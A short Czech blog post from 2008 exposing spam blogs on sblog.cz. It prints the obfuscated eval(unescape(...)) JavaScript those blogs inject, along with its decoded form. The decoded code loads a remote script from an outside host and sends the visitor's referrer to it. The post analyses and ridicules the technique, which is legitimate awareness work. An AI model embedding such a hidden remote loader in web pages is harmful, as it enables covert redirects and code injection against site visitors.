PELMEL
domashneeporevo1.ru

Sblog.cz plný spamu a porna

29. 3. 2008

Shodou náhod jsem narazil na několik blogů na adrese sblog.cz, které jsou založeny spammery a fungují čistě pro přesměrování na pharmacy, porno, a další SPAM affiliate weby.

Způsob spamu, nebo chcete-li hacku je až trapně jednoduchý. Do stránky je vložen kódovaný javascript (pomocí funkce escape()), která je pak funkcí eval() vykonán.

Takový kód vypadá například takto:

eval(unescape("%66%75%6e%63%74%69%6f%6e%20%69%6e%63%6c%75%64%65%5f%64%6f%6d%28%73%63%72%69%70%74%5f%66%69%6c%65%6e%61%6d%65%29%20%7b%0a%20%20%76%61%72%20%64%6f%63%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%68%65%61%64%22%29%2e%69%74%65%6d%28%30%29%0a%20%20%76%61%72%20%6a%73%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%22%73%63%72%69%70%74%22%29%0a%20%20%6a%73%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%22%6c%61%6e%67%75%61%67%65%22%2c%20%22%6a%61%76%61%73%63%72%69%70%74%22%29%0a%20%20%6a%73%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%22%74%79%70%65%22%2c%20%22%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%22%29%0a%20%20%6a%73%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%22%73%72%63%22%2c%20%73%63%72%69%70%74%5f%66%69%6c%65%6e%61%6d%65%29%0a%20%20%64%6f%63%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%6a%73%29%0a%20%20%72%65%74%75%72%6e%20%66%61%6c%73%65%0a%7d%0a%66%75%6e%63%74%69%6f%6e%20%67%6f%28%29%20%7b%0a%69%6e%63%6c%75%64%65%5f%64%6f%6d%28%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%69%6e%61%6e%63%65%2d%6c%65%61%64%65%72%73%2e%63%6f%6d%2f%66%65%65%64%32%2e%70%68%70%3f%6b%65%79%77%6f%72%64%3d%22%2b%20%65%73%63%61%70%65%28%22%31%30%39%35%22%29%2b%22%26%66%65%65%64%3d%38%26%72%65%66%3d%22%2b%20%65%73%63%61%70%65%28%64%6f%63%75%6d%65%6e%74%2e%72%65%66%65%72%72%65%72%29%29%0a%20%20%72%65%74%75%72%6e%20%66%61%6c%73%65%0a%7d%0a%67%6f%28%29%3b%0a"));

Po rozkódování se ve stránce vykoná tento skript:

function include_dom(script_filename) { var doc = document.getElementsByTagName("head").item(0) var js = document.createElement("script") js.setAttribute("language", "javascript") js.setAttribute("type", "text/javascript") js.setAttribute("src", script_filename) doc.appendChild(js) return false } function go() { include_dom("http://www.finance-leaders.com/feed2.php?keyword="+ escape("1095")+"&feed=8&ref="+ escape(document.referrer)) return false } go();

Trapné, co? :)

Pro příklad 50 blogů, které patří těmto spamerům. V reálu jich bude typuju pár tisíc :) více

RSS